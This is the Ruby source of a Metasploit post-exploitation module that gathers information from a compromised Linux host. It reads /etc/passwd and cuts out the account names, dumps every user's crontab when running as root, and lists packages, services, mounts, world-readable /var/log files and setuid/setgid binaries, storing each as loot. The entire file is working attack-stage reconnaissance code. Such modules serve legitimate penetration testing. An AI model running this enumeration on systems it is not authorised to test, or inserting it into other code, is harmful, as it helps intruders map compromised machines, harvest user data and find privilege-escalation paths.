##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
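class Metasploit3 < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Linux Gather System and User Information',
      'Description'  => %q{
        This module gathers system information. We collect
        installed packages, installed services, mount information,
        user list, user bash history and cron jobs
      },
      'License'      => MSF_LICENSE,
      'Author'       =>
        [
          'Carlos Perez <carlos_perez[at]darkoperator.com>', # get_packages and get_services
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # get_cron and original enum_linux
          'sinn3r', # Testing and modification of original enum_linux
          'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing
          'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid
        ],
      'Platform'     => ['linux'],
      'SessionTypes' => ['shell', 'meterpreter']
    ))
  end

  # Module entry point.
  #
  # Reads distro/version/kernel via get_sysinfo, then collects the user list,
  # installed packages, configured services, cron jobs, mount/df output,
  # world-readable files under /var/log and setuid/setgid files, storing each
  # result as a separate loot entry via #save.
  def run
    distro = get_sysinfo
    store_loot(
      "linux.version",
      "text/plain",
      session,
      "Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",
      "linux_info.txt",
      "Linux Version")

    # Print the info
    print_good("Info:")
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    # One account name per line; consumed by get_crons when running as root.
    users = execute("/bin/cat /etc/passwd | cut -d : -f 1")
    user = execute("/usr/bin/whoami")
    print_good("\tModule running as \"#{user}\" user")

    installed_pkg = get_packages(distro[:distro])
    installed_svc = get_services(distro[:distro])
    mount = execute("/bin/mount -l")
    crons = get_crons(users, user)
    diskspace = execute("/bin/df -ahT")
    disks = (mount + "\n\n" + diskspace)

    # -perm -4: regular files under /var/log readable by "other".
    logfiles = execute("find /var/log -type f -perm -4 2> /dev/null")
    # Regular files with the setuid and/or setgid bit that are also
    # world-executable, staying on the root filesystem (-xdev).
    # NOTE(review): GNU findutils has deprecated the `-perm +MODE` spelling in
    # favour of `-perm /MODE`; on a find that rejects it this silently yields
    # nothing because stderr is discarded — confirm against current targets.
    uidgid = execute("find / -xdev -type f -perm +6000 -perm -1 2> /dev/null")

    save("Linux version", distro)
    save("User accounts", users)
    save("Installed Packages", installed_pkg)
    save("Running Services", installed_svc)
    save("Cron jobs", crons)
    save("Disk info", disks)
    save("Logfiles", logfiles)
    save("Setuid/setgid files", uidgid)
  end

  # Store +data+ as loot of type "linux.enum.system" and report where it went.
  #
  # @param msg   [String] human-readable label, also used as the loot info field
  # @param data  [String] content to store
  # @param ctype [String] content type of +data+ (default 'text/plain')
  def save(msg, data, ctype = 'text/plain')
    ltype = "linux.enum.system"
    loot = store_loot(ltype, ctype, session, data, nil, msg)
    print_status("#{msg} stored in #{loot}")
  end

  # Resolve the target hostname from the session.
  #
  # Not called from #run. Returns nil (after printing "Running module against ")
  # for a session type matching neither /meterpreter/ nor /shell/.
  #
  # @return [String, nil]
  def get_host
    host = nil
    case session.type
    when /meterpreter/
      host = sysinfo["Computer"]
    when /shell/
      host = session.shell_command_token("hostname").chomp
    end
    print_status("Running module against #{host}")
    host
  end

  # Run +cmd+ on the target through cmd_exec, logging it in verbose mode.
  #
  # @param cmd [String] shell command line
  # @return [String, nil] whatever cmd_exec returns
  def execute(cmd)
    vprint_status("Execute: #{cmd}")
    cmd_exec(cmd)
  end

  # Read +filename+ from the target, logging it in verbose mode.
  # Not called from #run.
  #
  # Fixed: the verbose message now interpolates the filename; previously the
  # parameter was never shown.
  #
  # @param filename [String] path on the target
  # @return [String, nil] whatever read_file returns
  def cat_file(filename)
    vprint_status("Download: #{filename}")
    read_file(filename)
  end

  # List installed packages using the package manager matching +distro+.
  #
  # @param distro [String] distro name as returned by get_sysinfo[:distro]
  # @return [String] package listing, or "" when the distro is unrecognised
  def get_packages(distro)
    packages_installed = ""
    case distro
    when /fedora|redhat|suse|mandrake|oracle|amazon/
      packages_installed = execute("rpm -qa")
    when /slackware/
      packages_installed = execute("/bin/ls /var/log/packages")
    when /ubuntu|debian/
      packages_installed = execute("/usr/bin/dpkg -l")
    when /gentoo/
      packages_installed = execute("equery list")
    when /arch/
      packages_installed = execute("/usr/bin/pacman -Q")
    else
      print_error("Could not determine package manager to get list of installed packages")
    end
    packages_installed
  end

  # List configured services using the init tooling matching +distro+.
  #
  # @param distro [String] distro name as returned by get_sysinfo[:distro]
  # @return [String] service listing, or "" when the distro is unrecognised
  def get_services(distro)
    services_installed = ""
    case distro
    when /fedora|redhat|suse|mandrake|oracle|amazon/
      services_installed = execute("/sbin/chkconfig --list")
    when /slackware/
      # rc.d scripts ending in "*" (executable) are enabled, others disabled.
      # .to_s guards the append against a nil result from execute.
      services_installed << "\nEnabled:\n*************************\n"
      services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'").to_s
      services_installed << "\n\nDisabled:\n*************************\n"
      services_installed << execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'").to_s
    when /ubuntu|debian/
      services_installed = execute("/usr/sbin/service --status-all")
    when /gentoo/
      services_installed = execute("/bin/rc-status --all")
    when /arch/
      services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
    else
      print_error("Could not determine the Linux Distribution to get list of configured services")
    end
    services_installed
  end

  # Account names that are safe to interpolate into a shell command line.
  # Anything else in /etc/passwd is not a normal account name and is skipped
  # rather than being passed to the shell.
  SAFE_USER_NAME = /\A[\w.\-]+\$?\z/

  # Collect crontab listings.
  #
  # When running as root, every account named in +users+ (the raw output of
  # `cut -d : -f 1` on /etc/passwd, one name per line) is queried with
  # `crontab -u NAME -l`; otherwise only the current user's crontab is read.
  #
  # Fixed: the root branch previously built cron_data inside a block and fell
  # off the end of the method, so the caller received the Array of user names
  # instead of the cron listing. The redundant outer loop that only acted when
  # the literal name "root" appeared in the list has been dropped.
  #
  # @param users [String, nil] newline-separated account names
  # @param user  [String] name of the user the session runs as
  # @return [String] concatenated crontab output
  def get_crons(users, user)
    if user == "root" && !users.nil?
      vprint_status("Enumerating as root")
      cron_data = ""
      users.chomp.split.each do |usr|
        # Do not hand an unexpected name from a (possibly tampered) passwd to the shell.
        if usr !~ SAFE_USER_NAME
          vprint_status("Skipping unexpected user name #{usr.inspect}")
          next
        end
        cron_data << "*****Listing cron jobs for #{usr}*****\n"
        cron_data << execute("crontab -u #{usr} -l").to_s << "\n\n"
      end
      cron_data
    else
      vprint_status("Enumerating as #{user}")
      cron_data = "***** Listing cron jobs for #{user} *****\n\n"
      cron_data + execute("crontab -l").to_s
    end
  end
end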